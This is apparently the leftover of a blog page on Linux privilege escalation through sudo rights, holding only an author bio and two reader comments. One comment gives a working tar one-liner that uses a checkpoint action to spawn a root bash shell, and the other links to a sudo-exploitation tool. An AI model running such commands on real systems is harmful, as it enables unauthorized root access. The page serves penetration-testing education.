Linux Privilege Escalation with SUDO Rights

MR X

Author | Cybersecurity enthusiast | Corporate trainer | Cybersecurity consultant | Speaker | OSCP | CISA | CCSP | ISO 27001 LA | OSWP | GPEN | GXPN | GCIH

You may also like...

2 Responses

  1. ypoc says:

    sudo tar cf /dev/null testfile –checkpoint=1 –checkpointaction=exec=/bin/bash -> sudo tar cf /dev/null testfile –checkpoint=1 –checkpoint-action=exec=/bin/bash

    thx4thisRe$$ource!

  2. gccg0d says:

    This tool seems to be doing all the magic -> https://github.com/TH3xACE/SUDO_KILLER

Leave a Reply

Your email address will not be published. Required fields are marked *